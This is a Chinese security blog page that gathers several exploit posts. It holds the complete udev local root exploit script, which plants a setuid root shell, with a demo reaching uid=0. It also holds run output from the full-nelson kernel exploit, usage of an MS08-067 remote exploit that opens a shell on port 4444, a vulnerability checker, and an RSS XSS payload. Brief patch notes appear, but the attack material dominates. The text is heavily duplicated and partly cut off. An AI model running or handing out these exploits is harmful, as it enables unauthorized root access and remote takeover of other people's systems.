利用 Linux 内核的多个安全漏洞获得 root 权限
[ 2010/12/10 13:28 | by selboo ]
系统安全高手 Dan Rosenberg 发布了一段 C 程序,这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:
[code]$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffff
[code]$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffff
普通用户通过udev漏洞提升到root权限
[ 2009/06/25 17:30 | by selboo ]
udev权限提示的漏洞,只要有普通用户权限,即可提升到root权限
udev.sh
演示自己看了
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
udev.sh
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
演示自己看了
[selboo@selboo ~]$ id
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
Windows下MS08-067.exe
[ 2008/11/03 18:30 | by selboo ]
使用方法:
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
下载文件 (已下载 515 次)
Microsoft 安全公告 MS08-067 - 严重
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
下载文件 (已下载 515 次)Microsoft 安全公告 MS08-067 - 严重
python版MS08-067漏洞检测工具
[ 2008/11/03 18:26 | by selboo ]
This tool can be used to anonymously check if a target machine or a list of target machines are affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)
Usage
$ python ms08-067_check.py -h
Usage: ms08-067_check.py [-d] {-t |-l }
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-l LIST text file with list of targets
-s be silent
Example
$ python ms08-067_check.py -t 192.168.123.30
192.168.123.30: VULNERABLE
下载地址:ms08-067_check.py
MD5: 67E72C148E5B3E606E4FEAAEF9436563
SHA1:5F0EF8BDBA8B58F2E2FF9F0C1B2176823A2FB92B
Usage
$ python ms08-067_check.py -h
Usage: ms08-067_check.py [-d] {-t |-l }
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-l LIST text file with list of targets
-s be silent
Example
$ python ms08-067_check.py -t 192.168.123.30
192.168.123.30: VULNERABLE
下载地址:ms08-067_check.py
MD5: 67E72C148E5B3E606E4FEAAEF9436563
SHA1:5F0EF8BDBA8B58F2E2FF9F0C1B2176823A2FB92B
多款RSS阅读器出现XSS漏洞
[ 2008/09/27 23:17 | by selboo ]
受影响系统:
调用以下内核解析RSS的RSS阅读器:
INTERNET EXPLORER ver<= IE7 (其他版本未经测试,估计也有)
OPERA ver <=9.52
以下阅读器出现漏洞:
新浪点点通1.1.0.8 目前最高
周博通4.0(28031409) 目前最高
遨游2.1.4.443(目前最高) RSS侧边栏
。。。不再一一列举。
不受影响系统:
GOOGLE的RSS reader,因为这个RSS阅读器没有调用IE的内核去解析,而是自己解析后输出为html。
描述:
IE和OPERA对RSS中- 下的
标签内容,解析过程如下:
首先使用HTML编码对内容解密(例:‘<’解析为‘<’),之后执行其中HTML代码。
这种解析方式导致一些RSS阅读工具对此过滤不严,出现XSS漏洞。
<*来源:kxlzx (kxlzx@xiaotou.org) http://www.inbreak.net/ *>
测试方法:
在标签的内容中输入HTML编码后的JS代码,例如:
rss.xml代码
kxlzx.xsl代码
http://www.inbreak.net/kxlzxtest/rss8.xml
使用RSS阅读器订阅此地址。
建议:
没啥建议,祈祷RSS阅读器厂商升级好了。
链接:http://www.inbreak.net/?action=show&id=132
调用以下内核解析RSS的RSS阅读器:
INTERNET EXPLORER ver<= IE7 (其他版本未经测试,估计也有)
OPERA ver <=9.52
以下阅读器出现漏洞:
新浪点点通1.1.0.8 目前最高
周博通4.0(28031409) 目前最高
遨游2.1.4.443(目前最高) RSS侧边栏
。。。不再一一列举。
不受影响系统:
GOOGLE的RSS reader,因为这个RSS阅读器没有调用IE的内核去解析
描述:
IE和OPERA对RSS中
首先使用HTML编码对内容解密(例:‘<’解析为‘<’),之后执行其中HTML代码。
这种解析方式导致一些RSS阅读工具对此过滤不严,出现XSS漏洞。
<*来源:kxlzx (kxlzx@xiaotou.org) http://www.inbreak.net/ *>
测试方法:
在
rss.xml代码
<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='kxlzx.xsl' type='text/xsl' ?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"
version="2.0">
<channel>
<update>Mon, 26 Oct 2008 10:36:52 +0800</update>
<title>hacked by kxlzx</title>
<description>hacked by kxlzx</description>
<item>
<title>hacked by kxlzx title</title>
<author xmlns="http://www.w3.org/2005/Atom">
<name>test all</name>
</author>
<id xmlns="http://www.w3.org/2005/Atom">http://www.inbreak.net/</id>
<description><script>alert('xss');</script></description>
<pubDate>Mon, 27 Oct 2008 09:34:54 +0800</pubDate>
</item>
</channel>
</rss>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"
version="2.0">
<channel>
<update>Mon, 26 Oct 2008 10:36:52 +0800</update>
<title>hacked by kxlzx</title>
<description>hacked by kxlzx</description>
<item>
<title>hacked by kxlzx title</title>
<author xmlns="http://www.w3.org/2005/Atom">
<name>test all</name>
</author>
<id xmlns="http://www.w3.org/2005/Atom">http://www.inbreak.net/</id>
<description><script>alert('xss');</script></description>
<pubDate>Mon, 27 Oct 2008 09:34:54 +0800</pubDate>
</item>
</channel>
</rss>
kxlzx.xsl代码
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="html" indent="yes" doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" doctype-public="-//W3C//DTD XHTML 1.0 Transitional//EN"/>
<xsl:variable name="title" select="/rss/channel/title"/>
<xsl:variable name="feedUrl" select="/rss/channel/atom:link[@ref='self']/@href" xmlns:atom="http://www.w3.org/2005/Atom"/>
<xsl:variable name="srclink" select="/rss/channel/link"/>
<xsl:template match="/">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<xsl:apply-templates select="rss/channel"/>
</html>
</xsl:template>
<xsl:template match="channel">
<body>
<div id="wrapper">
<div id="content">
<xsl:apply-templates select="image"/>
<h1><a href="{link}" style="color:#94B3C5;"><xsl:value-of select="$title"/></a></h1>
<p id="desc"><xsl:value-of select="description" disable-output-escaping="yes"/></p>
<ul id="item" class="item">
<xsl:apply-templates select="item"/>
</ul>
</div>
</div>
</body>
</xsl:template>
<xsl:template match="item">
<li>
<h2><a href="{link}"><xsl:value-of select="title"/></a></h2>
<span class="date"> <xsl:value-of select="pubDate"/></span>
<p name="decodeable" class="itemcontent"><xsl:call-template name="outputContent"/></p>
<xsl:if test="count(child::enclosure)=1">
<dd>
<a href="{enclosure/@url}">
<img src="http://www.feedsky.com/images/listen.gif" style="vertical-align: middle; padding-left: 4px;"/>
</a>
</dd>
</xsl:if>
</li>
</xsl:template>
<xsl:template match="image">
<xsl:element name="img" namespace="http://www.w3.org/1999/xhtml">
<xsl:attribute name="src"><xsl:value-of select="url"/></xsl:attribute>
<xsl:attribute name="alt">
Link to <xsl:value-of select="title"/></xsl:attribute>
<xsl:attribute name="id">feedimage</xsl:attribute>
</xsl:element>
<xsl:text> </xsl:text>
</xsl:template>
<xsl:template match="feedsky:browserFriendly" xmlns:feedsky="http://namespace.org/feedsky/ext/1.0">
<p id="ownerblurb" xmlns="http://www.w3.org/1999/xhtml">
<em>A message from the feed publisher:</em>
<xsl:text> </xsl:text>
<xsl:apply-templates/>
</p>
</xsl:template>
<xsl:template name="outputContent">
<xsl:choose>
<xsl:when test="xhtml:body" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:copy-of select="xhtml:body/*"/>
</xsl:when>
<xsl:when test="xhtml:div" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:copy-of select="xhtml:div"/>
</xsl:when>
<xsl:when test="content:encoded" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<xsl:value-of select="content:encoded" disable-output-escaping="yes"/>
</xsl:when>
<xsl:when test="description">
<xsl:value-of select="description" disable-output-escaping="yes"/>
</xsl:when>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>
演示地址:<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="html" indent="yes" doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" doctype-public="-//W3C//DTD XHTML 1.0 Transitional//EN"/>
<xsl:variable name="title" select="/rss/channel/title"/>
<xsl:variable name="feedUrl" select="/rss/channel/atom:link[@ref='self']/@href" xmlns:atom="http://www.w3.org/2005/Atom"/>
<xsl:variable name="srclink" select="/rss/channel/link"/>
<xsl:template match="/">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<xsl:apply-templates select="rss/channel"/>
</html>
</xsl:template>
<xsl:template match="channel">
<body>
<div id="wrapper">
<div id="content">
<xsl:apply-templates select="image"/>
<h1><a href="{link}" style="color:#94B3C5;"><xsl:value-of select="$title"/></a></h1>
<p id="desc"><xsl:value-of select="description" disable-output-escaping="yes"/></p>
<ul id="item" class="item">
<xsl:apply-templates select="item"/>
</ul>
</div>
</div>
</body>
</xsl:template>
<xsl:template match="item">
<li>
<h2><a href="{link}"><xsl:value-of select="title"/></a></h2>
<span class="date"> <xsl:value-of select="pubDate"/></span>
<p name="decodeable" class="itemcontent"><xsl:call-template name="outputContent"/></p>
<xsl:if test="count(child::enclosure)=1">
<dd>
<a href="{enclosure/@url}">
<img src="http://www.feedsky.com/images/listen.gif" style="vertical-align: middle; padding-left: 4px;"/>
</a>
</dd>
</xsl:if>
</li>
</xsl:template>
<xsl:template match="image">
<xsl:element name="img" namespace="http://www.w3.org/1999/xhtml">
<xsl:attribute name="src"><xsl:value-of select="url"/></xsl:attribute>
<xsl:attribute name="alt">
Link to <xsl:value-of select="title"/></xsl:attribute>
<xsl:attribute name="id">feedimage</xsl:attribute>
</xsl:element>
<xsl:text> </xsl:text>
</xsl:template>
<xsl:template match="feedsky:browserFriendly" xmlns:feedsky="http://namespace.org/feedsky/ext/1.0">
<p id="ownerblurb" xmlns="http://www.w3.org/1999/xhtml">
<em>A message from the feed publisher:</em>
<xsl:text> </xsl:text>
<xsl:apply-templates/>
</p>
</xsl:template>
<xsl:template name="outputContent">
<xsl:choose>
<xsl:when test="xhtml:body" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:copy-of select="xhtml:body/*"/>
</xsl:when>
<xsl:when test="xhtml:div" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:copy-of select="xhtml:div"/>
</xsl:when>
<xsl:when test="content:encoded" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<xsl:value-of select="content:encoded" disable-output-escaping="yes"/>
</xsl:when>
<xsl:when test="description">
<xsl:value-of select="description" disable-output-escaping="yes"/>
</xsl:when>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>
http://www.inbreak.net/kxlzxtest/rss8.xml
使用RSS阅读器订阅此地址。
建议:
没啥建议,祈祷RSS阅读器厂商升级好了。
链接:http://www.inbreak.net/?action=show&id=132
